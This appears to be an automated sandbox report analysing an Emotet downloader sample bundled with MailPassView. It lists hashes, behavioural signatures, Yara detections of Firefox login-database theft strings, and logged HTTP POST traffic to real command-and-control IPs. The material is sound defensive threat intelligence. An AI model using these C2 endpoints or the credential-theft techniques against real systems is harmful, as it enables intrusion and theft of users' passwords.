Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Trojan.DownLoader34.9370.3972.9467

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.DownLoader34.9370.3972.9467 (renamed file extension from 9467 to exe)
Analysis ID:255750
MD5:4b15ebd8435204917268dc9fb49e6f1c
SHA1:caa209068607aed25f4b75b4fa694967c8ed8b87
SHA256:dd81162cc1f6e31565ec939e25c5cacf5d9f26fd2fef40e56f4f0dfef07499ca

Most interesting Screenshot:

Detection

Emotet MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Emotet Banking Trojan found
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected MailPassView
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Process Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe (PID: 7112 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe' MD5: 4B15EBD8435204917268DC9FB49E6F1C)
    • msfeedsbs.exe (PID: 6168 cmdline: C:\Windows\SysWOW64\msi\msfeedsbs.exe MD5: 4B15EBD8435204917268DC9FB49E6F1C)
      • msfeedsbs.exe (PID: 6364 cmdline: 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' 'C:\Users\user\AppData\Local\Temp\CB36.tmp' MD5: 4B15EBD8435204917268DC9FB49E6F1C)
      • msfeedsbs.exe (PID: 6460 cmdline: 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D0A6.tmp' MD5: 4B15EBD8435204917268DC9FB49E6F1C)
      • msfeedsbs.exe (PID: 6412 cmdline: 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D402.tmp' MD5: 4B15EBD8435204917268DC9FB49E6F1C)
      • msfeedsbsoe.exe (PID: 6924 cmdline: 'C:\Windows\SysWOW64\msi\msfeedsbsoe.exe' 'C:\Users\user\AppData\Local\Temp\CB36.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • svchost.exe (PID: 4496 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5492 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6596 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6912 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6800 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6588 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2312 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5544 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5652 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5884 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1356 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6496 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.231168035.0000000002251000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000009.00000002.274549880.0000000000400000.00000040.00000001.sdmpAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
    • 0x147b0:$a1: logins.json
    • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
    • 0x14f34:$s4: \mozsqlite3.dll
    • 0x137a4:$s5: SMTP Password
    00000009.00000002.274549880.0000000000400000.00000040.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
      00000001.00000003.270006445.0000000003A99000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000007.00000002.277303523.0000000000400000.00000040.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
          Click to see the 21 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.msfeedsbs.exe.3e20000.9.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            9.2.msfeedsbs.exe.400000.0.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
            • 0x131b0:$a1: logins.json
            • 0x13110:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
            • 0x13934:$s4: \mozsqlite3.dll
            • 0x121a4:$s5: SMTP Password
            9.2.msfeedsbs.exe.400000.0.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
              1.3.msfeedsbs.exe.3ff0000.1.raw.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
              • 0x147b0:$a1: logins.json
              • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
              • 0x14f34:$s4: \mozsqlite3.dll
              • 0x137a4:$s5: SMTP Password
              1.3.msfeedsbs.exe.3ff0000.1.raw.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                Click to see the 19 entries

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Suspicious Process CreationShow sources
                Source: Process startedAuthor: Florian Roth, Daniil Yugoslavskiy, oscd.community (update): Data: Command: 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D0A6.tmp', CommandLine: 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D0A6.tmp', CommandLine|base64offset|contains: (f, Image: C:\Windows\SysWOW64\msi\msfeedsbs.exe, NewProcessName: C:\Windows\SysWOW64\msi\msfeedsbs.exe, OriginalFileName: C:\Windows\SysWOW64\msi\msfeedsbs.exe, ParentCommandLine: C:\Windows\SysWOW64\msi\msfeedsbs.exe, ParentImage: C:\Windows\SysWOW64\msi\msfeedsbs.exe, ParentProcessId: 6168, ProcessCommandLine: 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D0A6.tmp', ProcessId: 6460

                Signature Overview

                Click to jump to signature section

                Show All Signature Results
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_0044438D __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,0_2_0044438D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_004448A3 FindFirstFileA,FindClose,0_2_004448A3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_0225286B FindFirstFileW,FindNextFileW,FindClose,0_2_0225286B
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 1_2_0044438D __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,1_2_0044438D
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 1_2_004448A3 FindFirstFileA,FindClose,1_2_004448A3
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_2_0040A1A7 FindFirstFileW,FindNextFileW,7_2_0040A1A7
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 7_1_0040A1A7 FindFirstFileW,FindNextFileW,7_1_0040A1A7
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 9_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,9_2_0040702D
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 9_1_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,9_1_0040702D

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.4:49713 -> 179.60.229.168:443
                Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.4:49719 -> 185.94.252.13:443
                Source: global trafficHTTP traffic detected: POST /1IAsFZvuGiSlwuhIa/jB5GvJyKSYp/ HTTP/1.1Referer: http://185.94.252.13/1IAsFZvuGiSlwuhIa/jB5GvJyKSYp/Content-Type: multipart/form-data; boundary=---------------------------478067155910569User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4580Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /MpgTsM1J0/6qj3hhMoM75iKVOg/8pfEG30u/JSj9UiSQyHPjM/Te19Jv/MzuRY8URe2gRU/ HTTP/1.1Referer: http://185.94.252.13/MpgTsM1J0/6qj3hhMoM75iKVOg/8pfEG30u/JSj9UiSQyHPjM/Te19Jv/MzuRY8URe2gRU/Content-Type: multipart/form-data; boundary=---------------------------478007351471322User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /nvl6N9BkGu8qGBj1kt/Scnz1D0wnF/XhO4nU7uDSvXi/ HTTP/1.1Referer: http://185.94.252.13/nvl6N9BkGu8qGBj1kt/Scnz1D0wnF/XhO4nU7uDSvXi/Content-Type: multipart/form-data; boundary=---------------------------843726928946680User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /4eFGIr2Q/ HTTP/1.1Referer: http://185.94.252.13/4eFGIr2Q/Content-Type: multipart/form-data; boundary=---------------------------833999072921064User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /0QTVRe/ HTTP/1.1Referer: http://185.94.252.13/0QTVRe/Content-Type: multipart/form-data; boundary=---------------------------493295889600463User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /WlvFVMzY9o0MCu7bGt/5LzttrT8yu1JU/0DI9yVpNQIVQjaC1Ymm/9Me6TS/PUv4tc/ HTTP/1.1Referer: http://185.94.252.13/WlvFVMzY9o0MCu7bGt/5LzttrT8yu1JU/0DI9yVpNQIVQjaC1Ymm/9Me6TS/PUv4tc/Content-Type: multipart/form-data; boundary=---------------------------324971134791349User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /RZet/JcZR9R/4cj9gTCjsqKt3/ HTTP/1.1Referer: http://88.217.172.65/RZet/JcZR9R/4cj9gTCjsqKt3/Content-Type: multipart/form-data; boundary=---------------------------334418556186205User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 88.217.172.65:443Content-Length: 4356Connection: Keep-AliveCache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 179.60.229.168
                Source: unknownTCP traffic detected without corresponding DNS query: 179.60.229.168
                Source: unknownTCP traffic detected without corresponding DNS query: 179.60.229.168
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                Source: svchost.exe, 00000016.00000003.388264493.0000019D2DF58000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN"," equals www.facebook.com (Facebook)
                Source: svchost.exe, 00000016.00000003.388264493.0000019D2DF58000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN"," equals www.twitter.com (Twitter)
                Source: msfeedsbs.exe, 00000001.00000003.279002576.00000000039FD000.00000004.00000001.sdmp, msfeedsbs.exe, 00000007.00000002.277303523.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: msfeedsbs.exe, 00000001.00000003.279002576.00000000039FD000.00000004.00000001.sdmp, msfeedsbs.exe, 00000007.00000002.277303523.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: msfeedsbs.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: msfeedsbs.exe, 00000007.00000003.277194814.0000000000B59000.00000004.00000001.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srffile:///C:/jbxinitvm.au3file://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: msfeedsbs.exe, 00000007.00000003.277194814.0000000000B59000.00000004.00000001.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srffile:///C:/jbxinitvm.au3file://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: unknownHTTP traffic detected: POST /1IAsFZvuGiSlwuhIa/jB5GvJyKSYp/ HTTP/1.1Referer: http://185.94.252.13/1IAsFZvuGiSlwuhIa/jB5GvJyKSYp/Content-Type: multipart/form-data; boundary=---------------------------478067155910569User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4580Connection: Keep-AliveCache-Control: no-cache
                Source: msfeedsbs.exe, 00000001.00000003.265151798.0000000002830000.00000004.00000001.sdmpString found in binary or memory: http://179.60.229.168/ATro903NoCC/HeMJ3uWuizwWl/IwzysKn18/ogDoqDpLetGknDRgC0a/
                Source: msfeedsbs.exe, 00000001.00000002.499031804.00000000027C4000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13/1IAsFZvuGiSlwuhIa/jB5GvJyKSYp/
                Source: msfeedsbs.exe, 00000001.00000002.499252084.0000000002838000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/0QTVRe/
                Source: msfeedsbs.exe, 00000001.00000002.499252084.0000000002838000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/0QTVRe/M
                Source: msfeedsbs.exe, 00000001.00000003.266758693.0000000002838000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/1IAsFZvuGiSlwuhIa/jB5GvJyKSYp/
                Source: msfeedsbs.exe, 00000001.00000003.320758170.000000000284D000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/4eFGIr2Q/
                Source: msfeedsbs.exe, 00000001.00000002.499252084.0000000002838000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/4eFGIr2Q/V
                Source: msfeedsbs.exe, 00000001.00000003.320758170.000000000284D000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/4eFGIr2Q/WOW64
                Source: msfeedsbs.exe, 00000001.00000002.499252084.0000000002838000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/WlvFVMzY9o0MCu7bGt/5LzttrT8yu1JU/0DI9yVpNQIVQjaC1Ymm/9Me6TS/PUv4tc/
                Source: msfeedsbs.exe, 00000001.00000002.499252084.0000000002838000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/nvl6N9BkGu8qGBj1kt/Scnz1D0wnF/XhO4nU7uDSvXi/
                Source: msfeedsbs.exe, 00000001.00000002.499252084.0000000002838000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/nvl6N9BkGu8qGBj1kt/Scnz1D0wnF/XhO4nU7uDSvXi/5
                Source: msfeedsbs.exe, 00000001.00000003.320472104.0000000002850000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65/RZet/JcZR9R/4cj9gTCjsqKt3/
                Source: msfeedsbs.exe, 00000001.00000003.320472104.0000000002850000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65/RZet/JcZR9R/4cj9gTCjsqKt3/Z
                Source: msfeedsbs.exe, 00000001.00000003.320472104.0000000002850000.00000004.00000001.sdmp, msfeedsbs.exe, 00000001.00000002.499252084.0000000002838000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/RZet/JcZR9R/4cj9gTCjsqKt3/
                Source: msfeedsbs.exe, 00000001.00000002.499252084.0000000002838000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/RZet/JcZR9R/4cj9gTCjsqKt3/)
                Source: msfeedsbs.exe, 00000001.00000003.320472104.0000000002850000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/RZet/JcZR9R/4cj9gTCjsqKt3/J
                Source: svchost.exe, 00000004.00000002.500442562.000002116DE0E000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.404505748.0000019D2DF13000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                Source: svchost.exe, 00000004.00000002.500442562.000002116DE0E000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.404505748.0000019D2DF13000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: svchost.exe, 00000004.00000002.497186265.00000211688A1000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.404505748.0000019D2DF13000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: svchost.exe, 00000004.00000002.501127718.000002116E170000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: svchost.exe, 0000000C.00000002.306386180.0000017351413000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
